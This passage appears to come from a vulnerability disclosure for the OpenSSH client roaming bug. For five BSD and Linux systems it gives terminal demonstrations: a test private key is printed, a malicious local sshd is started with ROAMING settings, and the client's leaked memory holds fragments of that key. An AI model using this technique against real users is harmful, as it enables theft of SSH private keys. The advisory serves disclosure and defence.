$ cat ~/.ssh/id_rsa -----BEGIN RSA PRIVATE KEY----- MIIEpQIBAAKCAQEA3GKWpUCOmK05ybfhnXTTzWAXs5A0FufmqlihRKqKHyflYXhr qlcdPH4PvbAhkc8cUlK4c/dZxNiyD04Og1MVwVp2kWp9ZDOnuLhTR2mTxYjEy+1T M3/74toaLj28kwbQjTPKhENMlqe+QVH7pH3kdun92SEqzKr7Pjx4/2YzAbAlZpT0 9Zj/bOgA7KYWfjvJ0E9QQZaY68nEB4+vIK3agB6+JT6lFjVnSFYiNQJTPVedhisd a3KoK33SmtURvSgSLBqO6e9uPzV87nMfnSUsYXeej6yJTR0br44q+3paJ7ohhFxD zzqpKnK99F0uKcgrjc3rF1EnlyexIDohqvrxEQIDAQABAoIBAQDHvAJUGsIh1T0+ eIzdq3gZ9jEE6HiNGfeQA2uFVBqCSiI1yHGrm/A/VvDlNa/2+gHtClNppo+RO+OE w3Wbx70708UJ3b1vBvHHFCdF3YWzzVSujZSOZDvhSVHY/tLdXZu9nWa5oFTVZYmk oayzU/WvYDpUgx7LB1tU+HGg5vrrVw6vLPDX77SIJcKuqb9gjrPCWsURoVzkWoWc bvba18loP+bZskRLQ/eHuMpO5ra23QPRmb0p/LARtBW4LMFTkvytsDrmg1OhKg4C vcbTu2WOK1BqeLepNzTSg2wHtvX8DRUJvYBXKosGbaoIOFZvohoqSzKFs+R3L3GW hZz9MxCRAoGBAPITboUDMRmvUblU58VW85f1cmPvrWtFu7XbRjOi3O/PcyT9HyoW bc3HIg1k4XgHk5+F9r5+eU1CiUUd8bOnwMEUTkyr7YH/es+O2P+UoypbpPCfEzEd muzCFN1kwr4RJ5RG7ygxF8/h/toXua1nv/5pruro+G+NI2niDtaPkLdfAoGBAOkP wn7j8F51DCxeXbp/nKc4xtuuciQXFZSz8qV/gvAsHzKjtpmB+ghPFbH+T3vvDCGF iKELCHLdE3vvqbFIkjoBYbYwJ22m4y2V5HVL/mP5lCNWiRhRyXZ7/2dd2Jmk8jrw sj/akWIzXWyRlPDWM19gnHRKP4Edou/Kv9Hp2V2PAoGBAInVzqQmARsi3GGumpme vOzVcOC+Y/wkpJET3ZEhNrPFZ0a0ab5JLxRwQk9mFYuGpOO8H5av5Nm8/PRB7JHi /rnxmfPGIWJX2dG9AInmVFGWBQCNUxwwQzpz9/VnngsjMWoYSayU534SrE36HFtE K+nsuxA+vtalgniToudAr6H5AoGADIkZeAPAmQQIrJZCylY00dW+9G/0mbZYJdBr +7TZERv+bZXaq3UPQsUmMJWyJsNbzq3FBIx4Xt0/QApLAUsa+l26qLb8V+yDCZ+n UxvMSgpRinkMFK/Je0L+IMwua00w7jSmEcMq0LJckwtdjHqo9rdWkvavZb13Vxh7 qsm+NEcCgYEA3KEbTiOU8Ynhv96JD6jDwnSq5YtuhmQnDuHPxojgxSafJOuISI11 1+xJgEALo8QBQT441QSLdPL1ZNpxoBVAJ2a23OJ/Sp8dXCKHjBK/kSdW3U8SJPjV pmvQ0UqnUpUj0h4CVxUco4C906qZSO5Cemu6g6smXch1BCUnY0TcOgs= -----END RSA PRIVATE KEY-----

env ROAMING="client_out_buf_size:1280" "`pwd`"/sshd -o ListenAddress=127.0.0.1:222 -o UsePrivilegeSeparation=no -f /etc/ssh/sshd_config -h /etc/ssh/ssh_host_rsa_key

$ /usr/bin/ssh -p 222 127.0.0.1 user@127.0.0.1's password: [connection suspended, press return to resume][connection resumed]

cat /tmp/roaming-97ed9f59/infoleak

MIIEpQIBAAKCAQEA3GKWpUCOmK05ybfhnXTTzWAXs5A0FufmqlihRKqKHyflYXhr qlcdPH4PvbAhkc8cUlK4c/dZxNiyD04Og1MVwVp2kWp9ZDOnuLhTR2mTxYjEy+1T M3/74toaLj28kwbQjTPKhENMlqe+QVH7pH3kdun92SEqzKr7Pjx4/2YzAbAlZpT0 9Zj/bOgA7KYWfjvJ0E9QQZaY68nEB4+vIK3agB6+JT6lFjVnSFYiNQJTPVedhisd a3KoK33SmtURvSgSLBqO6e9uPzV87nMfnSUsYXeej6yJTR0br44q+3paJ7ohhFxD zzqpKnK99F0uKcgrjc3rF1EnlyexIDohqvrxEQIDAQABAoIBAQDHvAJUGsIh1T0+ eIzdq3gZ9jEE6HiNGfeQA2uFVBqCSiI1yHGrm/A/VvDlNa/2+gHtClNppo+RO+OE w3Wbx70708UJ3b1vBvHHFCdF3YWzzVSujZSOZDvhSVHY/tLdXZu9nWa5oFTVZYmk oayzU/WvYDpUgx7LB1tU+HGg5vrrVw6vLPDX77SIJcKuqb9gjrPCWsURoVzkWoWc bvba18loP+bZskRLQ/eHuMpO5ra23QPRmb0p/LARtBW4LMFTkvytsDrmg1OhKg4C vcbTu2WOK1BqeLepNzTSg2wHtvX8DRUJvYBXKosGbaoIOFZvohoqSzKFs+R3L3GW hZz9MxCRAoGBAPITboUDMRmvUblU58VW85f1cmPvrWtFu7XbRjOi3O/PcyT9HyoW bc3HIg1k4XgHk5+F9r5+eU1CiUUd8bOnwMEUTkyr7YH/es+O2P+UoypbpPCfEzEd muzCFN1kwr4RJ5RG7ygxF8/h/toXua1nv/5pruro+G+NI2niDtaPkLdfAoGBAOkP wn7j8F51DCxeXbp/nKc4xtuuciQXFZSz8qV/gvAsHzKjtpmB+ghPFbH+T3vvDCGF iKELCHLdE3vvqbFIkjoBYbYwJ22m4y2V5HVL/mP5lCNWiRhRyXZ7/2dd2Jmk8jrw sj/akWIzXWyRlPDWM19gnHRKP4Edou/Kv9Hp2V2PAoGBAInVzqQmARsi3GGumpme

Private Key Disclosure example: FreeBSD 9.2, 1024-bit DSA key

$ head -n 1 /etc/motd FreeBSD 9.2-RELEASE (GENERIC) #0 r255898: Fri Sep 27 03:52:52 UTC 2013

$ /usr/bin/ssh -V OpenSSH_6.2p2, OpenSSL 0.9.8y 5 Feb 2013

$ cat ~/.ssh/id_dsa -----BEGIN DSA PRIVATE KEY----- MIIBugIBAAKBgQCEfEo25eMTu/xrpVQxBGEjW/WEfeH4jfqaCDluPBlcl5dFd8KP grGm6fh8c+xdNYRg+ogHwM3uDG5aY62X804UGysCUoY5isSDkkwGrbbemHxR/Cxe 4bxlIbQrw8KY39xLOY0hC5mpPnB01Cr+otxanYUTpsb8gpEngVvK619O0wIVAJwY 8RLHmLnPaMFSOvYvGW6eZNgtAoGACkP73ltWMdHM1d0W8Tv403yRPaoCRIiTVQOw oM8/PQ1JVFmBJxrJXtFJo88TevlDHLEghapj4Wvpx8NJY917bC425T2zDlJ4L9rP IeOjqy+HwGtDXjTHspmGy59CNe8E6vowZ3XM4HYH0n4GcwHvmzbhjJxYGmGJrng4 cRh4VTwCgYAPxVV+3eA46WWZzlnttzxnrr/w/9yUC/DfrKKQ2OGSQ9zyVn7QEEI+ iUB2lkeMqjNwPkxddONOBZB7kFmjOS69Qp0mfmsRf15xneqU8IoMSwqa5LOXM0To zEpLjvCtyTJcJgz2oHglVUJqGAx8CQJq2wS+eiSQqJbQpmexNa5GfwIUKbRxQKlh PHatTfiy5p82Q8+TD60= -----END DSA PRIVATE KEY-----

env ROAMING="client_out_buf_size:768" "`pwd`"/sshd -o ListenAddress=127.0.0.1:222 -o UsePrivilegeSeparation=no -f /etc/ssh/sshd_config -h /etc/ssh/ssh_host_rsa_key

$ /usr/bin/ssh -p 222 127.0.0.1 [connection suspended, press return to resume][connection resumed]

cat /tmp/roaming-9448bb7f/infoleak

MIIBugIBAAKBgQCEfEo25eMTu/xrpVQxBGEjW/WEfeH4jfqaCDluPBlcl5dFd8KP grGm6fh8c+xdNYRg+ogHwM3uDG5aY62X804UGysCUoY5isSDkkwGrbbemHxR/Cxe 4bxlIbQrw8KY39xLOY0hC5mpPnB01Cr+otxanYUTpsb8gpEngVvK619O0wIVAJwY 8RLHmLnPaMFSOvYvGW6eZNgtAoGACkP73ltWMdHM1d0W8Tv403yRPaoCRIiTVQOw oM8/PQ1JVFmBJxrJXtFJo88TevlDHLEghapj4Wvpx8NJY917bC425T2zDlJ4L9rP IeOjqy+HwGtDXjTHspmGy59CNe8E6vowZ3XM4HYH0n4GcwHvmzbhjJxYGmGJrng4 cRh4VTwCgYAPxVV+3eA46WWZzlnttzxnrr/w/9yUC/DfrKKQ2OGSQ9zyVn7QEEI+ iUB2lkeMqjNwPkxddONOBZB7kFmjOS69Qp0mfmsRf15xneqU8IoMSwqa5LOXM0To ...

env ROAMING="client_out_buf_size:1024" "`pwd`"/sshd -o ListenAddress=127.0.0.1:222 -o UsePrivilegeSeparation=no -f /etc/ssh/sshd_config -h /etc/ssh/ssh_host_rsa_key

$ /usr/bin/ssh -p 222 127.0.0.1 [connection suspended, press return to resume][connection resumed]

cat /tmp/roaming-279f5e2b/infoleak

... iUB2lkeMqjNwPkxddONOBZB7kFmjOS69Qp0mfmsRf15xneqU8IoMSwqa5LOXM0To zEpLjvCtyTJcJgz2oHglVUJqGAx8CQJq2wS+eiSQqJbQpmexNa5GfwIUKbRxQKlh PHatTfiy5p82Q8+TD60= ...

Private Key Disclosure example: OpenBSD 5.4, 2048-bit RSA key

$ head -n 1 /etc/motd OpenBSD 5.4 (GENERIC) #37: Tue Jul 30 15:24:05 MDT 2013

$ /usr/bin/ssh -V OpenSSH_6.3, OpenSSL 1.0.1c 10 May 2012

$ cat ~/.ssh/id_rsa -----BEGIN RSA PRIVATE KEY----- MIIEogIBAAKCAQEAzjortydu20T6wC6BhFzKNtVJ9uYSMOjWlghws4OkcXQtu+Cc VEhdal/HFyKyiNMAUDMi0gjOHsia8X4GS7xRNwSjUHOXnrvPne/bGF0d4DAxfAFL 9bOwoNnBIEFci37YMOcGArvrEJ7hbjJhGTudekRU78IMOichpdYtkpkGUyGmf175 ynUpCcJdzngL8yF9Iezc8bfXAyIJjzjXmSVu9DypkeUBW28qIuMr5ksbekHcXhQn w8Y2oEDeyPSGIdWZQcVpdfaAk+QjCEs84c0/AvZoG2iY85OptjNDfynFJSDR5muU MANXJm5JFfC89fy0nGkQJa1FfNpPjUQY8hWz7QIDAQABAoIBAQC36R6FJrBw8PIh oxezv8BB6DIe8gx0+6AqinpfTN3Ao9gJPYSMkUBlleaJllLbPDiCTSgXYOzYfRPY mwfoUJeo1gUCwSMM1vaPJZEhCCGVhcULjmh8RHQW7jqRllh+um74JX6xv34hA1+M k3cONqD4oamRa17WGYGjT/6yRq9iP/0AbBT+haRKYC4nKWrdkqEJXk10pM2kmH6G +umbybQrGrPf854VqOdftoku0WjBKrD0hsFZbB24rYmFj+cmbx+cDEqt03xjw+95 n5xM/97jqB6rzkPAdRUuzNec+QNGMvA+4YpItF1vdEfd0N3Jl/VIQ+8ZAhANnvCt 8uRHC7OhAoGBAO9PqmApW1CY+BeYDyqGduLwh1HVVZnEURQJprenOtoNxfk7hkNw rsKKdc6alWgTArLTEHdULU8GcZ6C0PEcszk2us3AwfPKko8gp2PD5t/8IW0cWxT5 cMxcelFydu8MuikFthqNEX4tPNrZy4FZlOBGXCYlhvDqHk+U7kVIhkLFAoGBANyb 3pLYm7gEs9zoL5HxEGvk9x2Ds9PlULcmc//p+4HCegE0tehMaGtygQKRQFuDKOJV WGKRjgls7vVXeVI2RABtYsT6OSBU9kNQ01EHzjOqN53O43e6GB4EA+W/GLEsffOZ pCw09bOVvgClicyekO3kv0lsVvIfAWgxVQY0oZ8JAoGBAIyisquEYmeBHfsvn2oM T32agMu0pXOSDVvLODChlFJk2b1YH9UuOWWWXRknezoIQgO5Sen2jBHu5YKTuhqY FTNAWJNl/hU5LNv0Aqr8i4eB8lre2SAAXyuaBUAsFnzxa82Dz7rWwDr4dtTePVws uvL6Jlk8oIqf62Q1T7ljn5NJAoGAQ8ZHHMobHO+k6ksSwj1TFDKlkJWzm3ep0nqn zIlv0S+UF+a/s/w1YD0vUUCaiwLCfrZFjxK0lkS3LPyQsyckwRTZ8TYGct5nQcsF ALHrMYgryfmTfGbZne8R23VX+qZ2k24yN7qVeXSZiM1ShmB4mf1anw3/sCbCYeY1 /tAQjzECf1NKzRdfWRhiBqlEquNshrUNWQxYVnXl+WPgilKAIc1XJ9M0dOCvhwjk kRTxN77l+klobzq+q+BtPiy9mFmwtwPbAP8l5bVzkZSY2FBDOQiUWS9ZJrCUupeS Y1tzYFyta0xSod/NGoUd673IgfLnfiGMOLhy+9qhhwCqF10RiS0= -----END RSA PRIVATE KEY-----

env ROAMING="client_out_buf_size:2048" "`pwd`"/sshd -o ListenAddress=127.0.0.1:222 -o UsePrivilegeSeparation=no -f /etc/ssh/sshd_config -h /etc/ssh/ssh_host_rsa_key

$ /usr/bin/ssh -p 222 127.0.0.1 user@127.0.0.1's password: [connection suspended, press return to resume][connection resumed]

cat /tmp/roaming-35ee7ab0/infoleak

MIIEogIBAAKCAQEAzjortydu20T6wC6BhFzKNtVJ9uYSMOjWlghws4OkcXQtu+Cc VEhdal/HFyKyiNMAUDMi0gjOHsia8X4GS7xRNwSjUHOXnrvPne/bGF0d4DAxfAFL 9bOwoNnBIEFci37YMOcGArvrEJ7hbjJhGTudekRU78IMOichpdYtkpkGUyGmf175 ynUpCcJdzngL8yF9Iezc8bfXAyIJjzjXmSVu9DypkeUBW28qIuMr5ksbekHcXhQn w8Y2oEDeyPSGIdWZQcVpdfaAk+QjCEs84c0/AvZoG2iY85OptjNDfynFJSDR5muU MANXJm5JFfC89fy0nGkQJa1FfNpPjUQY8hWz7QIDAQABAoIBAQC36R6FJrBw8PIh oxezv8BB6DIe8gx0+6AqinpfTN3Ao9gJPYSMkUBlleaJllLbPDiCTSgXYOzYfRPY mwfoUJeo1gUCwSMM1vaPJZEhCCGVhcULjmh8RHQW7jqRllh+um74JX6xv34hA1+M k3cONqD4oamRa17WGYGjT/6yRq9iP/0AbBT+haRKYC4nKWrdkqEJXk10pM2kmH6G +umbybQrGrPf854VqOdftoku0WjBKrD0hsFZbB24rYmFj+cmbx+cDEqt03xjw+95 n5xM/97jqB6rzkPAdRUuzNec+QNGMvA+4YpItF1vdEfd0N3Jl/VIQ+8ZAhANnvCt 8uRHC7OhAoGBAO9PqmApW1CY+BeYDyqGduLwh1HVVZnEURQJprenOtoNxfk7hkNw rsKKdc6alWgTArLTEHdULU8GcZ6C0PEcszk2us3AwfPKko8gp2PD5t/8IW0cWxT5 cMxcelFydu8MuikFthqNEX4tPNrZy4FZlOBGXCYlhvDqHk+U7kVIhkLFAoGBANyb 3pLYm7gEs9zoL5HxEGvk9x2Ds9PlULcmc//p+4HCegE0tehMaGtygQKRQFuDKOJV WGKRjgls7vVXeVI2RABtYsT6OSBU9kNQ01EHzjOqN53O43e6GB4EA+W/GLEsffOZ pCw09bOVvgClicyekO3kv0lsVvIfAWgxVQY0oZ8JAoGBAIyisquEYmeBHfsvn2oM T32agMu0pXOSDVvLODChlFJk2b1YH9UuOWWWXRknezoIQgO5Sen2jBHu5YKTuhqY FTNAWJNl/hU5LNv0Aqr8i4eB8lre2SAAXyuaBUAsFnzxa82Dz7rWwDr4dtTePVws uvL6Jlk8oIqf62Q1T7ljn5NJAoGAQ8ZHHMobHO+k6ksSwj1TFDKlkJWzm3ep0nqn zIlv0S+UF+a/s/w1YD0vUUCaiwLCfrZFjxK0lkS3LPyQsyckwRTZ8TYGct5nQcsF ALHrMYgryfmTfGbZne8R23VX+qZ2k24yN7qVeXSZiM1ShmB4mf1anw3/sCbCYeY1 /tAQjzECf1NKzRdfWRhiBqlEquNshrUNWQxYVnXl+WPgilKAIc1XJ9M0dOCvhwjk kRTxN77l+klobzq+q+BtPiy9mFmwtwPbAP8l5bVzkZSY2FBDOQiUWS9ZJrCUupeS

$ /usr/bin/ssh -p 222 127.0.0.1 user@127.0.0.1's password: [connection suspended, press return to resume][connection resumed]

cat /tmp/roaming-6cb31d82/infoleak

... uvL6Jlk8oIqf62Q1T7ljn5NJAoGAQ8ZHHMobHO+k6ksSwj1TFDKlkJWzm3ep0nqn zIlv0S+UF+a/s/w1YD0vUUCaiwLCfrZFjxK0lkS3LPyQsyckwRTZ8TYGct5nQcsF ALHrMYgryfmTfGbZne8R23VX+qZ2k24yN7qVeXSZiM1ShmB4mf1anw3/sCbCYeY1 /tAQjzECf1NKzRdfWRhiBqlEquNshrUNWQxYVnXl+WPgilKAIc1XJ9M0dOCvhwjk kRTxN77l+klobzq+q+BtPiy9mFmwtwPbAP8l5bVzkZSY2FBDOQiUWS9ZJrCUupeS Y1tzYFyta0xSod/NGoUd673IgfLnfiGMOLhy+9qhhwCqF10RiS0=

Private Key Disclosure example: OpenBSD 5.8, 2048-bit RSA key

$ head -n 1 /etc/motd OpenBSD 5.8 (GENERIC) #1066: Sun Aug 16 02:33:00 MDT 2015

$ /usr/bin/ssh -V OpenSSH_7.0, LibreSSL 2.2.2

$ cat ~/.ssh/id_rsa -----BEGIN RSA PRIVATE KEY----- MIIEpAIBAAKCAQEAwe9ssfYbABhOGxnBDsPf5Hwypr3tVz4ZCK2Q9ZWWBYnk+KVL ruLv7NWzeuKF7ls8z4SdpP/09QIIWQO5xWmQ7OM7ndfHWexFoyS/MijorHLvwG1s 17KFF8aC5vcBTfVkWnFaERueyd+mxv+oIrskA3/DK7/Juojkq70aPAdafiWOuVT8 L/2exFuzpSmwiXbPuiPgImO9O+9VQ4flZ4qlO18kZxXF948GisxxkceOYWTIX6uh xSs/NEGF/drmB4RTAL1ZivG+e4IMxs5naLz4u3Vb8WTDeS6D62WM1eq5JRdlZtGP vavL01Kv3sYFvoD0OPUU4BjU8bd4Qb30C3719wIDAQABAoIBAG4zFpipN/590SQl Jka1luvGhyGoms0QRDliJxTlwzGygaGoi7D800jIxgv13BTtU0i4Grw/lXoDharP Kyi6K9fv51hx3J2EXK2vm9Vs2YnkZcf6ZfbLQkWYT5nekacy4ati7cL65uffZm19 qJTTsksqtkSN3ptYXlgYRGgH5av3vaTSTGStL8D0e9fcrjSdN0UntjBB7QGT8ZnY gQ1bsSlcPM/TB6JYmHWdpCAVeeCJdDhYoHKlwgQuTdpubdlM80f6qat7bsm95ZTK QolQFpmAXeU4Bs5kFlm0K0qYFkWNdI16ScOpK6AQZGUTcHICeRL3GEm6NC0HYBNt gKHPucECgYEA7ssL293PZR3W9abbivDxvtCjA+41L8Rl8k+J0Dj0QTQfeHxHD2eL cQO2lx4N3E9bJMUnnmjxIT84Dg7SqOWThh3Rof+c/vglyy5o/CzbScISQTvjKfuB +s5aNojIqkyKaesQyxmdacLxtBBppZvzCDTHBXvAe4t8Bus2DPBzbzsCgYEAz+jl hcsMQ1egiVVpxHdjtm3+D1lbgITk0hzIt9DYEIMBJ7y5Gp2mrcroJAzt7VA2s7Ri hBSGv1pjz4j82l00odjCyiUrwvE1Gs48rChzT1PcQvtPCCanDvxOHwpKlUTdUKZh vhxPK/DW3IgUL0MlaTOjncR1Zppz4xpF/cSlYHUCgYB0MhVZLXvHxlddPY5C86+O nFNWjEkRL040NIPo8G3adJSDumWRl18A5T+qFRPFik/depomuQXsmaibHpdfXCcG 8eeaHpm0b+dkEPdBDkq+f1MGry+AtEOxWUwIkVKjm48Wry2CxroURqn6Zqohzdra uWPGxUsKUvtNGpM4hKCHFQKBgQCM8ylXkRZZOTjeogc4aHAzJ1KL+VptQKsYPudc prs0RnwsAmfDQYnUXLEQb6uFrVHIdswrGvdXFuJ/ujEhoPqjlp5ICPcoC/qil5rO ZAX4i7PRvSoRLpMnN6mGpaV2mN8pZALzraGG+pnPnHmCqRTdw2Jy/NNSofdayV8V 8ZDkWQKBgQC2pNzgDrXLe+DIUvdKg88483kIR/hP2yJG1V7s+NaDEigIk8BO6qvp ppa4JYanVDl2TpV258nE0opFQ66Q9sN61SfWfNqyUelZTOTzJIsGNgxDFGvyUTrz uiC4d/e3Jlxj21nUciQIe4imMb6nGFbUIsylUrDn8GfA65aePLuaSg== -----END RSA PRIVATE KEY-----

"`pwd`"/sshd -o ListenAddress=127.0.0.1:222 -o UsePrivilegeSeparation=no -f /etc/ssh/sshd_config -h /etc/ssh/ssh_host_rsa_key

$ /usr/bin/ssh -o ProxyCommand="/usr/bin/nc -w 1 %h %p" -p 222 127.0.0.1 [connection suspended, press return to resume]Segmentation fault (core dumped)

(this example requires a ProxyCommand because of the NULL-aitop bug described in the Mitigating Factors of the Information Leak section, and crashes because of the NULL-pointer dereference discussed in the Mitigating Factors of the Buffer Overflow section)

cat /tmp/roaming-a5eca355/infoleak

ry+AtEOxWUwIkVKjm48Wry2CxroURqn6Zqohzdra uWPGxUsKUvtNGpM4hKCHFQKBgQCM8ylXkRZZOTjeogc4aHAzJ1KL+VptQKsYPudc prs0RnwsAmfDQYnUXLEQb6uFrVHIdswrGvdXFuJ/ujEhoPqjlp5ICPcoC/qil5rO ZAX4i7PRvSoRLpMnN6mGpaV2mN8pZALzraGG+pnPnHmCqRTdw2Jy/NNSofdayV8V 8ZDkWQKBgQC2pNzgDrXLe+DIUvdKg88483kIR/hP2yJG1V7s+NaDEigIk8BO6qvp ppa4JYanVDl2TpV258nE0opFQ66Q9sN61SfWfNqyUelZTOTzJIsGNgxDFGvyUTrz uiC4d/e3Jlxj21nUciQIe4imMb6nGFbUIsylUrDn8GfA65aePLuaSg==

Private Key Disclosure example: CentOS 7, 1024-bit DSA key

$ grep PRETTY_NAME= /etc/os-release PRETTY_NAME="CentOS Linux 7 (Core)"

$ /usr/bin/ssh -V OpenSSH_6.4p1, OpenSSL 1.0.1e-fips 11 Feb 2013

$ cat ~/.ssh/id_dsa -----BEGIN DSA PRIVATE KEY----- MIIBvQIBAAKBgQDmjJYHvennuPmKGxfMuNc4nW2Z1via6FkkZILWOO1QJLB5OXqe kt7t/AAr+1n0lJbC1Q8hP01LFnxKoqqWfHQIuQL+S88yr5T8KY/VxV9uCVKpQk5n GLnZn1lmDldNaqhV0ECESXZVEpq/8TR2m2XjSmE+7Y14hI0cjBdnOz2X8wIVAP0a Nmtvmc4H+iFvKorV4B+tqRmvAoGBAKjE7ps031YRb6S3htr/ncPlXKtNTSTwaakC o7l7mJT+lI9vTrQsu3QCLAUZnmVHAIj/m9juk8kXkZvEBXJuPVdL0tCRNAsCioD2 hUaU7sV6Nho9fJIclxuxZP8j+uzidQKKN/+CVbQougsLsBlstpuQ4Hr2DHmalL8X iISkLhuyAoGBAKKRxVAVr2Q72Xz6vRmbULRvsfG1sSxNHOssA9CWKByOjDr2mo1l B7oIhTZ+eGvtHjiOozM0PzlcRSu5ZY3ZN2hfXITp9/4oatxFUV5V8aniqyq4Kwj/ QlCmHO7eRlPArhylx8uRnoHkbTRe+by5fmPImz/3WUtgPnx8y3NOEsCtAhUApdtS F9AoVoZFKEGn4FEoYIqY3a4= -----END DSA PRIVATE KEY-----

env ROAMING="heap_massaging:linux" "`pwd`"/sshd -o ListenAddress=127.0.0.1:222 -o UsePrivilegeSeparation=no -f /etc/ssh/sshd_config -h /etc/ssh/ssh_host_rsa_key

$ /usr/bin/ssh -p 222 127.0.0.1 ...

strings /tmp/roaming-b7b16dfc/infoleak

jJYHvennuPmKGxfMuNc4nW2Z1via6FkkZILWOO1QJLB5OXqe kt7t/AAr+1n0lJbC1Q8hP01LFnxKoqqWfHQIuQL+S88yr5T8KY/VxV9uCVKpQk5

strings /tmp/roaming-b324ce87/infoleak

IuQL R2m2XjSmE+7Y14hI0cjBdnOz2X8wIVAP0a Nmtvmc4H+iFvKorV4B+tqRmvAoGBAKjE7ps031YRb6S3htr/ncPlXKtNTSTwaakC o7l7mJT+lI9v

strings /tmp/roaming-24011739/infoleak

KjE7ps031YRb6S3htr/ncPlXKtNTSTwaakC o7l7mJT+lI9vTrQsu3QCLAUZnmVHAIj/m9juk8kXkZvEBXJuPVdL0tCRNAsC

strings /tmp/roaming-37456846/infoleak

LsBlstpuQ4Hr2DHmalL8X iISkLhuyAoGBAKKRxVAVr2Q72Xz6vRmbULRvsfG1sSxNHOssA9CWKByOjDr2mo1l B7oIhTZ+eGvtHjiOozM0PzlcRSu5ZY3ZNA yq4Kwj/

strings /tmp/roaming-988ff54c/infoleak

GBAKKRxVAVr2Q72Xz6vRmbULRvsfG1sSxNHOssA9CWKByOjDr2mo1l B7oIhTZ+eGvtHjiOozM0PzlcRSu5ZY3ZN2hfXITp9/4oatxFUV5V8aniqyq4Kwj/

strings /tmp/roaming-53887fa5/infoleak

/4oatxFUV5V8aniqyq4Kwj/ QlCmHO7eRlPArhylx8uRnoHkbTRe+by5fmPImz/3WUtgPnx8y3NOEsCtAhUApdtS F9AoVoZFKEGn4FEoYIqY3a4

Private Key Disclosure example: Fedora 20, 2048-bit RSA key

$ grep PRETTY_NAME= /etc/os-release PRETTY_NAME="Fedora 20 (Heisenbug)"

$ /usr/bin/ssh -V OpenSSH_6.4p1, OpenSSL 1.0.1e-fips 11 Feb 2013

$ cat ~/.ssh/id_rsa -----BEGIN RSA PRIVATE KEY----- MIIEogIBAAKCAQEAmbj/XjOppLWSAhuLKiRoHsdp66LJdY2PvP0ht3GWDKKCk7Gz HLas5VjotS9rmupavGGDiicMHPClOttWAI9MRyvP77iZhSei/RzX1/UKk/broTDp o9ljBnQTzRAyw8ke72Ih77SOGfOLBvYlx80ZmESLYYH95aAeuuDvb236JnsgRPDQ /B/gyRIhfqis70USi05/ZbnAenFn+v9zoSduDYMzSM8mFmh9f+9PVb9qMHdfNkIy 2E78kt9BknU/bEcCWyL+IXNLV0rgRGAcE0ncKu13YvuH/7o4Q7bW2FYErT4P/FHK cRmpbVfAzJQb85uXUXaNLVW0A/gHqTaGCUWJUwIDAQABAoIBAD0ZpB8MR9SY+uTt j737ZIs/VeF7/blEwCotLvacJjj1axNLYVb7YPN0CGLj61BS8CfKVp9V7+Gc4P/o 6GEmk/oB9w9gf1zGqWkTytMiqcawMW4LZAJlSI/rGWe7lYHuceZSSgzd5lF4VP06 Xz/wTMkSDZh/M6zOnQhImcLforsiPbTKKIVLL6u13VUmDcYfaBh9VepjyN8i+KIV JQB26MlXSxuAp8o0BQUI8FY/dsObJ9xjMT/u2+prtAxpPNfKElEV7ZPBrTRAuCUr Hiy7yflZ3w0qHekNafX/tnWiU4zi/p6aD4rs10YaYSnSolsDs2k8wHbVP4VtLE8l PRfXS6ECgYEAyVf7Pr3TwTa0pPEk1dLz3XHoetTqUND/0Kv+i7MulBzJ4LbcsTEJ rtOuGGpLrAYlIvCgT+F26mov5fRGsjjnmP3P/PsvzR8Y9DhiWl9R7qyvNznQYxjo /euhzdYixxIkfqyopnYFoER26u37/OHe37PH+8U1JitVrhv7s4NYztECgYEAw3Ot gxMqsKh42ydIv1sBg1QEHu0TNvyYy7WCB8jnMsygUQ8EEJs7iKP//CEGRdDAwyGa jwj3EZsXmtP+wd3fhge7pIHp5RiKfBn0JtSvXQQHO0k0eEcQ4aA/6yESI62wOuaY vJ+q7WMo1wHtMoqRPtW/OAxUf91dQRtzK/GpRuMCgYAc7lh6vnoT9FFmtgPN+b7y 3fBC3h9BN5banCw6VKfnvm8/q+bwSxSSG3aTqYpwEH37lEnk0IfuzQ1O5JfX+hdF Q4tEVa+bsNE8HnH7fGDgg821iMgpxSWNfvNECXX71t6JmTOun5zVV6EixsmDn80P pdyhj8fAUU/BceHr/H6hUQKBgCX5SqPlzGyIPvrtVf//sXqPj0Fm9E3Bo/ooKLxU dz7ybM9y6GpFjrqMioa07+AOn/UJiVry9fXQuTRWre+CqRQEWpuqtgPR0c4syLfm qK+cwb7uCSi5PfloRiLryPdvnobDGLfFGdOHaX7km+4u5+taYg2Er8IsAxtMNwM5 r5bbAoGAfxRRGMamXIha8xaJwQnHKC/9v7r79LPFoht/EJ7jw/k8n8yApoLBLBYp P/jXU44sbtWB3g3eARxPL3HBLVVMWfW9ob7XxI4lKqCQ9cuKCBqosVbEQhNKZAj+ ZS16+aH97RKdJD/4qiskzzHvZs+wi4LKPHHHz7ETXr/m4CRfMIU= -----END RSA PRIVATE KEY-----

env ROAMING="heap_massaging:linux" "`pwd`"/sshd -o ListenAddress=127.0.0.1:222 -o UsePrivilegeSeparation=no -f /etc/ssh/sshd_config -h /etc/ssh/ssh_host_rsa_key

$ /usr/bin/ssh -p 222 127.0.0.1 ...

strings /tmp/roaming-a2bbc5f6/infoleak

cRmpbVfAzJQb85uXUXaNLVW0A/gHqTaGCUWJUwIDAQABAoIBAD0ZpB8MR9SY+uTt j737ZIs/VeF7/blEwCotLvacJjj1axNLYVb7YPN0CG

strings /tmp/roaming-47b46456/infoleak

RGAcE0nc GCUWJUwIDAQABAoIBAD0ZpB8MR9SY+uTt j737ZIs/VeF7/blEwCotLvacJjj1axNLYVb7YPN0CGLj61BS8CfKVp9V7+Gc4P/o 6GEmk/oB9

strings /tmp/roaming-7a6717ae/infoleak

cawMW4LZ1 Xz/wTMkSDZh/M6zOnQhImcLforsiPbTKKIVLL6u13VUmDcYfaBh9VepjyN8i+KIV JQB26MlXSxuAp8o0BQUI8FY/dsObJ9xjMT/u2+p

strings /tmp/roaming-f3091f08/infoleak

lZ3w0qHe nSolsDs2k8wHbVP4VtLE8l PRfXS6ECgYEAyVf7Pr3TwTa0pPEk1dLz3XHoetTqUND/0Kv+i7MulBzJ4LbcsTEJ

strings /tmp/roaming-62a9e9a3/infoleak

lZ3w0qHe r3TwTa0pPEk11 LbcsTEJ rtOuGGpLrAYlIvCgT+F26mov5fRGsjjnmP3P/PsvzR8Y9DhiWl9R7qyvNznQYxjo /euhzdYixxIkfqyopnYFoER26u37/OHe37P

strings /tmp/roaming-8de31ed5/infoleak

7qyvNznQ 26u37/OHe37PH+8U1JitVrhv7s4NYztECgYEAw3Ot gxMqsKh42ydIv1sBg1QEHu0TNvyYy7WCB8jnMsygUQ8EEJs7iKP//CEGRdDAwyGa

strings /tmp/roaming-f5e0fbcc/infoleak

